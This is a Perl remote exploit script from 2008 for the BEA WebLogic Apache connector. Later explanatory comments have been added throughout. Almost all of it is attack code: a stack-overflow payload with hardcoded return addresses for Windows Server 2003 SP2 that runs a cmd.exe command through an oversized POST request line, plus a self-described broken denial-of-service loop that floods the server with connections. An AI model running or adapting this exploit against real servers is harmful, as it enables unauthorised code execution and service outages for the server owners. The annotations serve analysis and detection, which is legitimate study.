===================================================================
Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
===================================================================
#// Bea Weblogic -- Apache Connector Remote Exploit +-1day
#// Should stack break latest Windows Server 2003 <address space randomization>
#// BIG THANKS TO
#// "dong-hun you"(Xpl017Elz) in INetCop - for his paper
#// "Title: Advanced exploitation in exec-shield (Fedora Core case study)"
#// His technique works fine against Windows 2003 latest version.
#//
#// The code is broken, since I am chilling out for now
#// SKIDDI BULLETPROOF
#// You may fixup the DoS Code, Windows Code Works on English OSs
#// KingCope -- July/2008
use IO::Socket;
use strict;
# Unbuffered STDOUT so the progress output below (the "." markers) shows up
# immediately instead of waiting for the buffer to fill.
$|=1;
my $apacheport = 80; #// Touch  -- TCP port of the Apache front end every request goes to
###
# State flags for the goto-driven control flow below: $wrongusage forces the
# usage exit; $dodoshost is set once the DoS section has been entered so that a
# jump back to setupsocket returns there instead of running target selection.
my $wrongusage = 0;
my $dodoshost = 0;
###############################################################################
### Target List Entries |Operating System and Patch Level / Kernel Version|
###############################################################################
# Only indices 0 and 100 are populated. The slots in between are undef and are
# printed as empty strings by the list loop (this file has no `use warnings`,
# so no "uninitialized" diagnostics appear either).
my @targets = ();
my @tgtname = ();
print "-" x 80;
$targets[0] = "1 Windows Server 2003 Enterprise Edition SP2 RC1 -- English\n";
$tgtname[0] = $targets[0];
$targets[100] = "2 Denial of Service\n";
$tgtname[100] = $targets[100];
###############################################################################
### Print Of Target List And Usage
###############################################################################
print "\n";
print "Bea Weblogic -- Apache Connector Remote Exploit\n\n";
print "Target List:\n";
foreach my $target (@targets) {
print $target;
}
print "\n\n";
print "-" x 80;
print "Usage: perl bea-unlock.pl <hostname or ip> <target>";
print "\n";
# Reached via `goto printusage` from the argument check. The banner and usage
# text above are printed unconditionally on every run; nothing is re-printed
# here, the label only leads to the exit.
printusage:
if ($wrongusage == 1) { exit; }
################################################################################
### Argument Parsing
################################################################################
my $host = $ARGV[0];
my $target = $ARGV[1];
# `==` is numeric comparison, not string `eq`: both operands are numified, so a
# missing argument (undef) and a non-numeric argument alike compare equal to ""
# here and take the usage exit.
if (($host == "") || ($target == "")) {
$wrongusage = 1;
goto printusage;
}
################################################################################
### Setup Socket
################################################################################
# Re-entered by `goto setupsocket` from the DoS loop; each pass re-runs the
# `my $sock` declaration and opens a fresh TCP connection. The constructor's
# return value is never checked, so a failed connect leaves $sock undef rather
# than exiting with an error.
setupsocket:
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $apacheport,
Proto => 'tcp');
if ($dodoshost == 1) {
goto doshost;
}
################################################################################
### Select Target
################################################################################
# Numeric dispatch on the second argument. Any value other than 1 or 2 falls
# through into the winexpl section below without printing a message.
if ($target == 1) {
print "Exploiting $host -- " . $tgtname[$target-1];
goto winexpl;
}
if ($target == 2) {
print "Attacking Host $host -- Denial of Service -- Wait ...\n";
goto doshost;
}
################################################################################
### Exploitation of Windows Versions
################################################################################
winexpl:
####WORKS [LOOKUP THE HOSTNAME]
# Proof-of-execution payload: the command only writes a marker file. On a host
# that was hit, c:\desiredfile.txt containing "works" is the on-disk artifact
# to look for during incident response. $sc is assigned but never used.
my $command = "echo works > c:\\desiredfile.txt";
my $cmds = "cmd.exe /c \"$command\"|";
my $sc = $cmds;
#### STACKBREAKING WITH WINEXEC() ON WINDOWS
# Overflow tail: 97 filler bytes followed by 32-bit native-endian unsigned
# values (pack "L"). Per the author's note these are addresses chosen for the
# single listed OS build, which is what makes the payload build-specific.
my $c = "C" x 97 . pack("L", 0x10013930) x 3 . pack("L", 0x10013930) . pack("L", 0x10013931) . pack("L",0x77EA411E);
# The HTTP request line itself carries the payload: the command string, "A"
# filler up to 4000 bytes, then $c, sent as `POST /.jsp <payload>` with a fixed
# `Host: localhost` header. A request line of this length and shape is what a
# request-line length limit or a WAF/IDS rule would key on.
my $a = $cmds . "A" x (4000-length($cmds)) . $c;
print $sock "POST /.jsp $a\r\nHost: localhost\r\n\r\n";
# Echo whatever the server sends back until it closes the connection.
while (<$sock>) {
print;
}
################################################################################
### Denial of Service Against The Apache Frontend Module For Bea Weblogic
################################################################################
####NEEDS SOME FIXUP
# Flagged by the author as unfinished. As written, every iteration jumps back
# to setupsocket, which opens another connection and (with $dodoshost set)
# jumps straight back to this label, so the send and the read loop below are
# never reached; the observable behaviour is an endless series of new TCP
# connections to $apacheport.
doshost:
$dodoshost = 1;
while(1) {
$a = "A" x 6000;
goto setupsocket;
print $sock "POST /.jsp $a\r\n\r\nHost: localhost\r\n\r\n";
# Reads the reply in 100-byte chunks into $_. $dosagain is re-declared as 0 on
# every chunk, so the exit branch is never taken as written, and the bare
# string inside it is a void-context expression, not a print.
while(read($sock,$_,100)) {
my $dosagain = 0;
if ($dosagain eq 1) {
"Server is down now\n";
exit;
}
if ($_ =~ /Server/) {
print ".";
$dosagain = 1;
next;
}
}
}
# 0day.today [2018-03-12]